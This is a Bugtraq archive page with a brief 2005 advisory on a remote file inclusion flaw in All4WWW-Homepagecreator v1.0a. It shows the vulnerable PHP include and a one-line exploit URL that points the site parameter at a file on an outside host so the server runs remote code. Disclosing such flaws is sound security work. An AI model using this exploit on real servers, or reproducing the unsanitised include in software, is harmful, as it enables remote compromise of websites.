Bugtraq mailing list archives
All4WWW-Homepagecreator Remote Command Execution
From: Francisco Alisson <dominusvis () click21 com br>
Date: 14 Apr 2005 03:21:42 -0000
################################################ # # Script: All4WWW-Homepagecreator # Version: v1.0a # Vendor: http://www.All4WWW.com # ################################################ I. Bug Code On index.php ... if(!$site) {$site="home";} include "$site.dat"; ... II. Exploit [vuln-host]/index.php?site=http://[host]/some-file PS.: The vendor wasn't inform. ############################################ # by Dominus_Vis # [Infektion Group] ############################################
Current thread:
- All4WWW-Homepagecreator Remote Command Execution Francisco Alisson (Apr 14)